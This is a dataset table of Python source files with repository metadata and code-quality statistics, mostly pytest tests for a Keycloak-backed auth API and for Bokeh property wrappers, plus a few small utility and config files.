hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ed723953fe1d49ebe0be1e4ba1f11492af23f1a5 | 11,097 | py | Python | tests/test_api/test_auth.py | guioliveirabh/rhub-api | e57de57719d16dc8cc16ca30933bf2fdc5519234 | [
"MIT"
] | 1 | 2022-02-17T11:45:13.000Z | 2022-02-17T11:45:13.000Z | tests/test_api/test_auth.py | guioliveirabh/rhub-api | e57de57719d16dc8cc16ca30933bf2fdc5519234 | [
"MIT"
] | null | null | null | tests/test_api/test_auth.py | guioliveirabh/rhub-api | e57de57719d16dc8cc16ca30933bf2fdc5519234 | [
"MIT"
] | null | null | null | import base64
from unittest.mock import ANY
import pytest
from rhub.auth.keycloak import KeycloakClient
from rhub.api import DEFAULT_PAGE_LIMIT
API_BASE = '/v0'
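
# Added note -- a hedged sketch of the pytest fixtures these tests assume (the
# real definitions live in the project's conftest.py; everything below is
# illustrative, including the patched accessor name). `client` is a Flask test
# client for the API application and `keycloak_mock` stands in for
# KeycloakClient, so no real Keycloak server is contacted. Roughly:
#
#     @pytest.fixture
#     def keycloak_mock(mocker):
#         mock = mocker.Mock(spec=KeycloakClient)
#         mocker.patch('rhub.api.get_keycloak', return_value=mock)  # hypothetical hook
#         return mock
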
def test_token_create(client, keycloak_mock):
keycloak_mock.login.return_value = {'access_token': 'foobar'}
rv = client.post(
f'{API_BASE}/auth/token/create',
headers={
'Authorization': 'Basic ' + base64.b64encode(b'user:pass').decode(),
}
)
keycloak_mock.login.assert_called_with('user', 'pass')
assert rv.status_code == 200
assert rv.json == {'access_token': 'foobar'}
def test_me(client, keycloak_mock):
keycloak_mock.user_get.return_value = {
'id': '00000000-0000-0000-0000-000000000000',
'username': 'user',
}
rv = client.get(
f'{API_BASE}/me',
headers={'Authorization': 'Bearer foobar'},
)
assert rv.status_code == 200
assert rv.json == {
'id': '00000000-0000-0000-0000-000000000000',
'username': 'user',
'_href': ANY,
}
def test_list_users(client, keycloak_mock):
keycloak_mock.user_list.return_value = [{
'id': '00000000-0000-0000-0000-000000000000',
'username': 'user',
}]
rv = client.get(
f'{API_BASE}/auth/user',
headers={'Authorization': 'Bearer foobar'},
)
keycloak_mock.user_list.assert_called_with({'first': 0, 'max': DEFAULT_PAGE_LIMIT})
assert rv.status_code == 200
assert rv.json == [{
'id': '00000000-0000-0000-0000-000000000000',
'username': 'user',
'_href': ANY,
}]
def test_create_user(client, keycloak_mock):
user_id = '00000000-0000-0000-0000-000000000000'
user_data = {'username': 'user', 'email': 'user@example.com'}
keycloak_mock.user_create.return_value = user_id
keycloak_mock.user_get.return_value = user_data | {'id': user_id}
rv = client.post(
f'{API_BASE}/auth/user',
headers={'Authorization': 'Bearer foobar'},
json=user_data,
)
keycloak_mock.user_create.assert_called_with(user_data)
keycloak_mock.user_get.assert_called_with(user_id)
assert rv.status_code == 200
assert rv.json == user_data | {'id': user_id, '_href': ANY}
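
# Note: `user_data | {...}` above relies on the PEP 584 dict-union operator,
# so this test module requires Python 3.9 or newer.
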
def test_get_user(client, keycloak_mock):
user_id = '00000000-0000-0000-0000-000000000000'
user_data = {'username': 'user', 'email': 'user@example.com'}
keycloak_mock.user_get.return_value = user_data | {'id': user_id}
rv = client.get(
f'{API_BASE}/auth/user/{user_id}',
headers={'Authorization': 'Bearer foobar'},
)
keycloak_mock.user_get.assert_called_with(user_id)
assert rv.status_code == 200
assert rv.json == user_data | {'id': user_id, '_href': ANY}
def test_update_user(client, keycloak_mock):
user_id = '00000000-0000-0000-0000-000000000000'
user_data = {'username': 'user', 'email': 'new-user@example.com'}
keycloak_mock.user_update.return_value = user_id
keycloak_mock.user_get.return_value = user_data | {'id': user_id}
rv = client.patch(
f'{API_BASE}/auth/user/{user_id}',
headers={'Authorization': 'Bearer foobar'},
json=user_data,
)
keycloak_mock.user_update.assert_called_with(user_id, user_data)
keycloak_mock.user_get.assert_called_with(user_id)
assert rv.status_code == 200
assert rv.json == user_data | {'id': user_id, '_href': ANY}
def test_delete_user(client, keycloak_mock):
user_id = '00000000-0000-0000-0000-000000000000'
keycloak_mock.user_delete.return_value = None
rv = client.delete(
f'{API_BASE}/auth/user/{user_id}',
headers={'Authorization': 'Bearer foobar'},
)
keycloak_mock.user_delete.assert_called_with(user_id)
assert rv.status_code == 200
assert rv.json == {}
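
# Note: per the assertions above, the delete endpoints respond with HTTP 200
# and an empty JSON object on success rather than 204 No Content.
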
def test_list_user_groups(client, keycloak_mock):
user_id = '00000000-0000-0000-0000-000000000000'
keycloak_mock.user_group_list.return_value = [{'id': user_id, 'name': 'admin'}]
rv = client.get(
f'{API_BASE}/auth/user/{user_id}/groups',
headers={'Authorization': 'Bearer foobar'},
)
keycloak_mock.user_group_list.assert_called_with(user_id)
assert rv.status_code == 200
assert rv.json == [{'id': user_id, 'name': 'admin', '_href': ANY}]
def test_add_user_group(client, keycloak_mock):
user_id = '00000000-0000-0000-0000-000000000000'
group_id = '00000000-0004-0003-0002-000000000001'
keycloak_mock.group_user_add.return_value = None
rv = client.post(
f'{API_BASE}/auth/user/{user_id}/groups',
headers={'Authorization': 'Bearer foobar'},
json={'id': group_id},
)
keycloak_mock.group_user_add.assert_called_with(user_id, group_id)
assert rv.status_code == 200
assert rv.json == {}
def test_delete_user_group(client, keycloak_mock):
user_id = '00000000-0000-0000-0000-000000000000'
group_id = '00000000-0004-0003-0002-000000000001'
keycloak_mock.group_user_remove.return_value = None
rv = client.delete(
f'{API_BASE}/auth/user/{user_id}/groups',
headers={'Authorization': 'Bearer foobar'},
json={'id': group_id},
)
keycloak_mock.group_user_remove.assert_called_with(user_id, group_id)
assert rv.status_code == 200
assert rv.json == {}
def test_list_groups(client, keycloak_mock):
keycloak_mock.group_list.return_value = [{
'id': '00000000-0000-0000-0000-000000000000',
'name': 'admin',
}]
rv = client.get(
f'{API_BASE}/auth/group',
headers={'Authorization': 'Bearer foobar'},
)
assert rv.status_code == 200
assert rv.json == [{
'id': '00000000-0000-0000-0000-000000000000',
'name': 'admin',
'_href': ANY,
}]
def test_create_group(client, keycloak_mock):
group_id = '00000000-0004-0003-0002-000000000001'
group_data = {'name': 'admin'}
keycloak_mock.group_create.return_value = group_id
keycloak_mock.group_get.return_value = group_data | {'id': group_id}
rv = client.post(
f'{API_BASE}/auth/group',
headers={'Authorization': 'Bearer foobar'},
json=group_data,
)
keycloak_mock.group_create.assert_called_with(group_data)
keycloak_mock.group_get.assert_called_with(group_id)
assert rv.status_code == 200
assert rv.json == group_data | {'id': group_id, '_href': ANY}
def test_get_group(client, keycloak_mock):
group_id = '00000000-0004-0003-0002-000000000001'
group_data = {'name': 'admin'}
keycloak_mock.group_get.return_value = group_data | {'id': group_id}
rv = client.get(
f'{API_BASE}/auth/group/{group_id}',
headers={'Authorization': 'Bearer foobar'},
)
keycloak_mock.group_get.assert_called_with(group_id)
assert rv.status_code == 200
assert rv.json == group_data | {'id': group_id, '_href': ANY}
def test_update_group(client, keycloak_mock):
group_id = '00000000-0004-0003-0002-000000000001'
group_data = {'name': 'new-admin'}
keycloak_mock.group_update.return_value = group_id
keycloak_mock.group_get.return_value = group_data | {'id': group_id}
rv = client.patch(
f'{API_BASE}/auth/group/{group_id}',
headers={'Authorization': 'Bearer foobar'},
json=group_data,
)
keycloak_mock.group_update.assert_called_with(group_id, group_data)
keycloak_mock.group_get.assert_called_with(group_id)
assert rv.status_code == 200
assert rv.json == group_data | {'id': group_id, '_href': ANY}
def test_delete_group(client, keycloak_mock):
group_id = '00000000-0004-0003-0002-000000000001'
keycloak_mock.group_delete.return_value = group_id
rv = client.delete(
f'{API_BASE}/auth/group/{group_id}',
headers={'Authorization': 'Bearer foobar'},
)
keycloak_mock.group_delete.assert_called_with(group_id)
assert rv.status_code == 200
assert rv.json == {}
def test_list_group_users(client, keycloak_mock):
group_id = '00000000-0004-0003-0002-000000000001'
user_data = {
'id': '00000000-0000-0000-0000-000000000000',
'username': 'user',
}
keycloak_mock.group_user_list.return_value = [user_data]
rv = client.get(
f'{API_BASE}/auth/group/{group_id}/users',
headers={'Authorization': 'Bearer foobar'},
)
keycloak_mock.group_user_list.assert_called_with(group_id)
assert rv.status_code == 200
assert rv.json == [user_data | {'_href': ANY}]
def test_list_roles(client, keycloak_mock):
keycloak_mock.role_list.return_value = [{
'id': '00000000-000d-000c-000b-00000000000a',
'name': 'admin',
}]
rv = client.get(
f'{API_BASE}/auth/role',
headers={'Authorization': 'Bearer foobar'},
)
assert rv.status_code == 200
assert rv.json == [{
'id': '00000000-000d-000c-000b-00000000000a',
'name': 'admin',
'_href': ANY,
}]
def test_create_role(client, keycloak_mock):
role_id = '00000000-000d-000c-000b-00000000000a'
role_data = {'name': 'admin'}
keycloak_mock.role_create.return_value = role_id
keycloak_mock.role_get.return_value = role_data | {'id': role_id}
rv = client.post(
f'{API_BASE}/auth/role',
headers={'Authorization': 'Bearer foobar'},
json=role_data,
)
keycloak_mock.role_create.assert_called_with(role_data)
keycloak_mock.role_get.assert_called_with(role_id)
assert rv.status_code == 200
assert rv.json == role_data | {'id': role_id, '_href': ANY}
def test_get_role(client, keycloak_mock):
role_id = '00000000-000d-000c-000b-00000000000a'
role_data = {'name': 'admin'}
keycloak_mock.role_get.return_value = role_data | {'id': role_id}
rv = client.get(
f'{API_BASE}/auth/role/{role_id}',
headers={'Authorization': 'Bearer foobar'},
)
keycloak_mock.role_get.assert_called_with(role_id)
assert rv.status_code == 200
assert rv.json == role_data | {'id': role_id, '_href': ANY}
def test_update_role(client, keycloak_mock):
role_id = '00000000-000d-000c-000b-00000000000a'
role_data = {'name': 'new-admin'}
keycloak_mock.role_update.return_value = role_id
keycloak_mock.role_get.return_value = role_data | {'id': role_id}
rv = client.patch(
f'{API_BASE}/auth/role/{role_id}',
headers={'Authorization': 'Bearer foobar'},
json=role_data,
)
keycloak_mock.role_update.assert_called_with(role_id, role_data)
keycloak_mock.role_get.assert_called_with(role_data['name'])
assert rv.status_code == 200
assert rv.json == role_data | {'id': role_id, '_href': ANY}
def test_delete_role(client, keycloak_mock):
role_id = '00000000-000d-000c-000b-00000000000a'
keycloak_mock.role_delete.return_value = role_id
rv = client.delete(
f'{API_BASE}/auth/role/{role_id}',
headers={'Authorization': 'Bearer foobar'},
)
keycloak_mock.role_delete.assert_called_with(role_id)
assert rv.status_code == 200
assert rv.json == {}
| 28.093671 | 87 | 0.663963 | 1,465 | 11,097 | 4.731058 | 0.057338 | 0.124657 | 0.055403 | 0.054538 | 0.909681 | 0.858606 | 0.828452 | 0.807531 | 0.774491 | 0.741884 | 0 | 0.102256 | 0.19717 | 11,097 | 394 | 88 | 28.164975 | 0.675721 | 0 | 0 | 0.637363 | 0 | 0 | 0.232766 | 0.132198 | 0 | 0 | 0 | 0 | 0.241758 | 1 | 0.076923 | false | 0.007326 | 0.018315 | 0 | 0.095238 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
9c23e782b202536af16f6631cc8e0cba828a2871 | 207 | py | Python | src/napalm_digineo_procurve/templates/parser.py | digineo/napalm-digineo-procurve | 477befcd09b0ce209c42f9742b2c4bb0986fceb8 | [
"Apache-2.0"
] | 4 | 2019-06-07T07:59:56.000Z | 2020-12-09T19:27:56.000Z | src/napalm_digineo_procurve/templates/parser.py | digineo/napalm-digineo-procurve | 477befcd09b0ce209c42f9742b2c4bb0986fceb8 | [
"Apache-2.0"
] | 1 | 2021-03-31T19:04:16.000Z | 2021-03-31T19:04:16.000Z | src/napalm_digineo_procurve/templates/parser.py | digineo/napalm-digineo-procurve | 477befcd09b0ce209c42f9742b2c4bb0986fceb8 | [
"Apache-2.0"
] | 1 | 2019-12-24T11:05:24.000Z | 2019-12-24T11:05:24.000Z | import napalm_digineo_procurve.templates.reader
def parse(raw_data: str, template_name: str):
t = napalm_digineo_procurve.templates.reader.read_template(template_name)
return t.ParseText(raw_data)
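
# Added usage sketch (illustrative only -- the template name and capture file
# are hypothetical). read_template() returns a TextFSM-style template object,
# so ParseText() yields one list of captured values per parsed record:
#
#     raw = open("show_system.txt").read()  # raw CLI output from a ProCurve switch
#     rows = parse(raw, "show_system")      # hypothetical template name
#     print(rows)                           # e.g. [['HP-2530', 'YA.16.04', ...]]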
| 29.571429 | 77 | 0.811594 | 29 | 207 | 5.482759 | 0.586207 | 0.163522 | 0.264151 | 0.377358 | 0.45283 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10628 | 207 | 6 | 78 | 34.5 | 0.859459 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
9c296077eabfa8c6a760736fd5f26b850c632b11 | 86 | py | Python | chatrooms/youtube/config.py | Dogeek/ChatAggregator | c1cf700e2529d6bb78ce7e4850c532ef55841d85 | [
"MIT"
] | 3 | 2019-11-17T19:31:08.000Z | 2020-12-07T00:47:22.000Z | chatrooms/youtube/config.py | Dogeek/ChatAggregator | c1cf700e2529d6bb78ce7e4850c532ef55841d85 | [
"MIT"
] | 16 | 2019-11-17T19:48:02.000Z | 2019-11-24T02:49:44.000Z | chatrooms/youtube/config.py | Dogeek/ChatAggregator | c1cf700e2529d6bb78ce7e4850c532ef55841d85 | [
"MIT"
] | 3 | 2019-11-17T19:31:13.000Z | 2019-11-21T11:59:18.000Z | client_id = "925824295105-eck95gj8beboqih77p0r2aujtoui4ppj.apps.googleusercontent.com" | 86 | 86 | 0.895349 | 7 | 86 | 10.857143 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.238095 | 0.023256 | 86 | 1 | 86 | 86 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0.827586 | 0.827586 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
9c3ff02c6e512338d8c4c66816f6ed48bc7a72e8 | 100 | py | Python | Anachebe Ikechukwu/Phase 1/Python Basic 1/Day 2/Qtn2.py | dreamchild7/python-challenges | 5d47df145da2613f756cf44a1e0cfe5fb0a49f35 | [
"MIT"
] | null | null | null | Anachebe Ikechukwu/Phase 1/Python Basic 1/Day 2/Qtn2.py | dreamchild7/python-challenges | 5d47df145da2613f756cf44a1e0cfe5fb0a49f35 | [
"MIT"
] | null | null | null | Anachebe Ikechukwu/Phase 1/Python Basic 1/Day 2/Qtn2.py | dreamchild7/python-challenges | 5d47df145da2613f756cf44a1e0cfe5fb0a49f35 | [
"MIT"
] | null | null | null | import sys
print("Python version")
print(sys.version)
print("Version info")
print(sys.version_info) | 20 | 23 | 0.78 | 15 | 100 | 5.133333 | 0.4 | 0.311688 | 0.38961 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08 | 100 | 5 | 24 | 20 | 0.836957 | 0 | 0 | 0 | 0 | 0 | 0.257426 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.2 | 0 | 0.2 | 0.8 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
92c2a8b5da6b30f4fa1a1de39f9c41d48dc31ef5 | 42 | py | Python | mynewfile.py | jakelever/exampleproject | d0082efb495635ac6eea5aab92f1e77bfe4c3259 | [
"MIT"
] | null | null | null | mynewfile.py | jakelever/exampleproject | d0082efb495635ac6eea5aab92f1e77bfe4c3259 | [
"MIT"
] | null | null | null | mynewfile.py | jakelever/exampleproject | d0082efb495635ac6eea5aab92f1e77bfe4c3259 | [
"MIT"
] | null | null | null | print("Hello world")
print("Hello again")
| 14 | 20 | 0.714286 | 6 | 42 | 5 | 0.666667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.095238 | 42 | 2 | 21 | 21 | 0.789474 | 0 | 0 | 0 | 0 | 0 | 0.52381 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
92cfb114c5c5c04e62afe5a6573582a786996d4b | 162 | py | Python | asyncjobs/__init__.py | jherland/asyncjobs | 1be027cab39f2ad3451766135100be7fe07b9386 | [
"MIT"
] | 1 | 2020-11-24T03:43:12.000Z | 2020-11-24T03:43:12.000Z | asyncjobs/__init__.py | jherland/asyncjobs | 1be027cab39f2ad3451766135100be7fe07b9386 | [
"MIT"
] | null | null | null | asyncjobs/__init__.py | jherland/asyncjobs | 1be027cab39f2ad3451766135100be7fe07b9386 | [
"MIT"
] | 2 | 2020-11-24T03:42:53.000Z | 2021-10-09T08:26:54.000Z | from . import polyfill # noqa: F401
from . import external_work, signal_handling
class Scheduler(external_work.Scheduler, signal_handling.Scheduler):
pass
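
# Added note (illustration, not part of the package): the combined Scheduler is
# plain cooperative multiple inheritance -- both mixins contribute behaviour,
# and the method resolution order can be inspected with:
#
#     >>> Scheduler.__mro__
#     (Scheduler, external_work.Scheduler, signal_handling.Scheduler, ...)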
| 23.142857 | 68 | 0.790123 | 20 | 162 | 6.2 | 0.6 | 0.16129 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021583 | 0.141975 | 162 | 6 | 69 | 27 | 0.870504 | 0.061728 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.25 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
92dd8b8b98ba0745b06799c1d866562b62797bb8 | 61 | py | Python | cotidia/cms/tests/__init__.py | guillaumepiot/cotidia-cms | 178bfe26b65f1e45d806d6cbe4dd2ec9dae04b7b | [
"BSD-3-Clause"
] | null | null | null | cotidia/cms/tests/__init__.py | guillaumepiot/cotidia-cms | 178bfe26b65f1e45d806d6cbe4dd2ec9dae04b7b | [
"BSD-3-Clause"
] | null | null | null | cotidia/cms/tests/__init__.py | guillaumepiot/cotidia-cms | 178bfe26b65f1e45d806d6cbe4dd2ec9dae04b7b | [
"BSD-3-Clause"
] | null | null | null | from .page import *
from .api import *
from .dataset import * | 20.333333 | 22 | 0.721311 | 9 | 61 | 4.888889 | 0.555556 | 0.454545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.180328 | 61 | 3 | 22 | 20.333333 | 0.88 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
92e70db5b5168ea52094ce71b6e6a88ae2c1d593 | 17,581 | py | Python | tests/unit/bokeh/core/property/test_wrappers__property.py | asellappen/bokeh | e003b82b18c8ee7fb36f23c5f877e5e16b792827 | [
"BSD-3-Clause"
] | null | null | null | tests/unit/bokeh/core/property/test_wrappers__property.py | asellappen/bokeh | e003b82b18c8ee7fb36f23c5f877e5e16b792827 | [
"BSD-3-Clause"
] | null | null | null | tests/unit/bokeh/core/property/test_wrappers__property.py | asellappen/bokeh | e003b82b18c8ee7fb36f23c5f877e5e16b792827 | [
"BSD-3-Clause"
] | null | null | null | #-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2021, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# External imports
from mock import patch
# Bokeh imports
from bokeh._testing.util.api import verify_all
from bokeh.core.properties import (
Angle,
Any,
Bool,
Color,
ColumnData,
Complex,
DashPattern,
Dict,
Either,
Enum,
Float,
Instance,
Int,
Interval,
List,
MinMaxBounds,
Percent,
Regex,
Seq,
Size,
String,
Tuple,
)
from bokeh.models import ColumnDataSource
# Module under test
import bokeh.core.property.wrappers as bcpw # isort:skip
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
ALL = (
'notify_owner',
'PropertyValueContainer',
'PropertyValueList',
'PropertyValueDict',
'PropertyValueColumnData',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
def test_notify_owner() -> None:
result = {}
class Foo:
@bcpw.notify_owner
def test(self): pass
def _notify_owners(self, old):
result['old'] = old
def _saved_copy(self): return "foo"
f = Foo()
f.test()
assert result['old'] == 'foo'
assert f.test.__doc__ == "Container method ``test`` instrumented to notify property owners"
def test_PropertyValueContainer() -> None:
pvc = bcpw.PropertyValueContainer()
assert pvc._owners == set()
pvc._register_owner("owner", "prop")
assert pvc._owners == {("owner", "prop")}
pvc._unregister_owner("owner", "prop")
assert pvc._owners == set()
with pytest.raises(RuntimeError):
pvc._saved_copy()
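
# Added note (sketch): PropertyValueContainer tracks a set of (owner, property)
# pairs, and mutators decorated with @notify_owner pass a saved copy of the old
# value to _notify_owners -- which is why the base _saved_copy() raises
# RuntimeError (asserted above) and must be overridden by concrete subclasses.
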
@patch('bokeh.core.property.wrappers.PropertyValueContainer._notify_owners')
def test_PropertyValueDict_mutators(mock_notify) -> None:
pvd = bcpw.PropertyValueDict(dict(foo=10, bar=20, baz=30))
mock_notify.reset_mock()
del pvd['foo']
assert mock_notify.called
mock_notify.reset_mock()
pvd['foo'] = 11
assert mock_notify.called
mock_notify.reset_mock()
pvd.pop('foo')
assert mock_notify.called
mock_notify.reset_mock()
pvd.popitem()
assert mock_notify.called
mock_notify.reset_mock()
pvd.setdefault('baz')
assert mock_notify.called
mock_notify.reset_mock()
pvd.clear()
assert mock_notify.called
mock_notify.reset_mock()
pvd.update(bar=1)
assert mock_notify.called
@patch('bokeh.core.property.descriptors.ColumnDataPropertyDescriptor._notify_mutated')
def test_PropertyValueColumnData___setitem__(mock_notify) -> None:
from bokeh.document.events import ColumnDataChangedEvent
source = ColumnDataSource(data=dict(foo=[10], bar=[20], baz=[30]))
pvcd = bcpw.PropertyValueColumnData(source.data)
pvcd._register_owner(source, source.lookup('data'))
mock_notify.reset_mock()
pvcd['foo'] = [11]
assert pvcd == dict(foo=[11], bar=[20], baz=[30])
assert mock_notify.call_count == 1
assert mock_notify.call_args[0] == (source, dict(foo=[10], bar=[20], baz=[30]))
assert 'hint' in mock_notify.call_args[1]
assert isinstance(mock_notify.call_args[1]['hint'], ColumnDataChangedEvent)
assert mock_notify.call_args[1]['hint'].column_source == source
assert mock_notify.call_args[1]['hint'].cols == ['foo']
@patch('bokeh.core.property.descriptors.ColumnDataPropertyDescriptor._notify_mutated')
def test_PropertyValueColumnData_update(mock_notify) -> None:
from bokeh.document.events import ColumnDataChangedEvent
source = ColumnDataSource(data=dict(foo=[10], bar=[20], baz=[30]))
pvcd = bcpw.PropertyValueColumnData(source.data)
pvcd._register_owner(source, source.lookup('data'))
mock_notify.reset_mock()
pvcd.update(foo=[11], bar=[21])
assert pvcd == dict(foo=[11], bar=[21], baz=[30])
